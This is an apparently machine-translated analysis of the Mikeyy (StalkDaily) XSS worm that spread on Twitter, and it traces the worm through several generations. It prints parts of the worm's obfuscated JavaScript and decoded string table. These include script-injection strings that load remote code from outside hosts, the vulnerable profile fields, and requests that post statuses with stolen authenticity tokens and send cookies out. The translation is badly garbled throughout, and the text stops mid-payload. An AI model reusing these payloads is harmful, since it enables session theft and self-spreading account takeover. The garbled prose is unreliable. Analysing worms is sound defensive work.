Vulnerabilities cannot be repaired, and Twitter crawls for five times: Mikeyy (StalkDaily) crawls from generation to generation

Source:A non-Alibaba Cloud Region

After the previous wave of Mikeyy crawling attacks, it took less than a day to flatten the system. The fourth generation of Mikeyy crawling appeared on twitter last night. After the announcement on twitter official website, after three hours of hard work, we finally effectively modified the XSS cross-site (cross-site attack) and stopped the spread of crawling.
In the above speech, twitter first announced: "Let's listen to your messages. We also know the fourth generation and are trying to solve the problem 」. After three hours, I finally announced: "We believe that the situation is under control. Thank you for your patience. We will continue to pay attention to Mikeyy 」.

That article yesterdayThe last sentence of "We said:" twitter cannot find all programs containing XSS vulnerabilities. In addition, Mikeyy indicates that this is not necessarily the case, therefore, there are still some pending errors in the future. 」 Unfortunately, the three generations and four generations (in fact five generations) of Mikeyy crawled last night, causing another wave of mixed transactions.TechCrunch has been renewed again.(A security event was reported to have been rejected by TechCruch for two days.) He believes that this event will cause heavy attacks to twitter's website.

The Mikeyy (StalkDaily) crawler we observed has five versions, and the later version also uses a special obfuscation ). In this article, we studied this worm for the first time.

[First Generation Mikeyy (StalkDaily)]

Line 8-80 of the first generation of bots will send the user's website and cookie to mikeyylolz.uuuq.com, and the user's logon information will be obtained successfully:

This Mikeyy statement does not steal the User Token, which is different in practice. In addition, at this time, the local javascript is crawled and placed in hxxp: // others.

The first generation of XSS vulnerabilities, such as url and location, are weak:

At this time, the infected person will receive the following warning messages:

randomUpdate[0]="Dude, www.StalkDaily.com is awesome. Whats the fuss?";  randomUpdate[1]="Join www.StalkDaily.com everyone!";  randomUpdate[2]="Woooo, www.StalkDaily.com :)";  randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";  randomUpdate[4]="Wow...www.StalkDaily.com";  randomUpdate[5]="@twitter www.StalkDaily.com";

[Second Generation Mikeyy (StalkDaily)]

The second generation of dynamic tool is very difficult. Original javascript ):

var _0x8da4=["x4Dx73x78x6Dx6Cx32x2Ex58x4Dx4Cx48x54x54x50",

"x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x54x54x50",

"x63x6Fx6Ex6Ex65x63x74","x74x6Fx55x70x70x65x72x43x61x73x65",

"x47x45x54","x3F","x6Fx70x65x6E","","x4Dx65x74x68x6Fx64",

"x50x4Fx53x54x20","x20x48x54x54x50x2Fx31x2Ex31",

"x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72",

"x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65",

"x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2D

x66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","

After reading the first batch of rows, you can see ):

var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", 

"GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", 

"Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", 

"readyState", "send", "split", "join", "", "%27", "(", "%28", ")", "%29", 

"*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", 

"documentElement", "exec", "Twitter should really fix this... Mikeyy", 

"I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this,

 regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a>

<script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22

%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f

%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));

</script> <a ", "mikeyy:) "></a><script>document.write(unescape

(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e

%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73

%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) ">

</a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72

%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30

%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c

%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update",

 "POST", "authenticity_token=", "&status=", "&return_rendered_status

=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++

++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", 

"/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme

=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user

[profile_link_color]=", "&commit=save+changes", "wait()""];function XHConn(){  var _0x6687x2,_0x6687x3=false;  try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  catch(e) { _0x6687x2=false; }; }; };

At this time, the mikeyylolz.uuq.com was shut down and the system was changed to "content.ireel.com/xssjs.js?#" http:/// configure" hxxp: // content.ireel.com/j.php. The above Code shows that the infected user will receive the following messages:

"Twitter shocould really fix this... Mikeyy"
"I am done... Mikeyy"
"Mikeyy is done .."
"Twitter please fix this, regards Mikeyy"

At the same time, we can see that Mikeyy still steals user tokens and cookies, but the program is moved to the wait () function.

In addition, the second generation starts to attack different XSS (Cross-Site Scripting) weak points, including "profile_background_tile" and "profile_link_color.

[Third generation Mikeyy (StalkDaily)]

In general, the third generation and the second generation are the same. Only the password-steal location "hxxp: // omghax.uuuq.com" is also disabled. Therefore, the attacker and cookie are switched back to "hxxp: // bambamyo.110mb.com/j.php?, then click "http://bambamyo.110mb.com/wompwomp. js 」.

One to three generations:
1. Both will steal user tokens and cookies

The first, second, and third generations are different:
1. The first generation is not mixed, and the second and third generations have
2. It is suggested that the location where javascript is placed is different from the location where the response attempts are sent/cookies are returned.
3. XSS attacks (XSS attacks) have different weak points
4. Different risks

The three generations of twitter handled the issue on Sunday (Asia time) and fixed the XSS vulnerability.

[Generation 4 Mikeyy (StalkDaily)]

The fourth generation of XSS (Cross-Site Scripting) was launched on Monday evening in the Asian continent, at that time, twitter was not repaired, and the bots quickly dispersed again. At this time, it is special that Mikeyy has already recognized that it was done by the hacker and will not be hidden, place intent javascript directly on your "StalkDaily.com" website. The following four generations of programming languages:

randomXSS[0] = "><